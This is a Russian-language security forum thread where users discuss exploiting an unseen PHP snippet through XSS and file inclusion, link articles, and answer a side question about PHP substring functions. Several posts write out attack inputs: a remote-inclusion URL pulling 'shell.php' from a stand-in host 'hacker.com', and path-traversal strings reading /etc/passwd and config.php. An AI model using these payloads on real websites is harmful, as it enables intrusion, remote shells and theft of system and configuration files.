ANTICHAT — форум по информационной безопасности, OSINT и технологиям

Если несложно,покажи пример как провести ксс с этим куском кода.(в позновательных целях)

+1, тоже стало интересно.

Ну вот тут почитайте, например:

http://www.virtuax.be/fztr/index.php?title=XSS_Intraframe_Logger

и тут кое-что:

http://securityvulns.ru/Tdocument29.html

а также LFI (PHP-inj):

http://n0ns3ns3.livejournal.com/219202.html (ctrl+f "include")

Мы хотели пример на данном куске кода выше, который показа nilux
/index.php?page=http://hacker.com/shell.php).
В скрипте nilux`не проинклудилось бы

Подскажите функцию которая определяет есть ли кусочек слова (к примеру в $_GET['my_get'])(не путайте с проверкой целой части слов)
Если есть кусочек слова то выводил что нибуть

зы Pashkela тоже интересно насчет XSS

strpos,stripos,preg_match,array_search,in_array

2 DDoSька:

это врядли можно продемонстрировать полноценно, когда выложено только:

Чтобы понять, что тут КОНКРЕТНЫЙ LFI, просто прочтите то, чему вы поверите:

http://forum.antichat.ru/thread23501.html

и не надо меня впредь просить искать уязвимость в коде:

остальной код (скрытый) имеет значение, для демонстрации уязвимости, когда просят именно так - "нет ты скажи, как именно здесь можно всё похерить"

а я не говорил о RFI, тут LFI, что очень часто достаточно

т.е. например:

/index.php?page=../../../../../../../../../../../../../../../../../../../../etc/passwd%00 очень даже просто могло бы, при определенных обстоятельствах, дать свои плоды

Не то

Это точно , от xss от отшли к php-inc
да и там "page1.php"
page/../../config.php , разве даст плоды?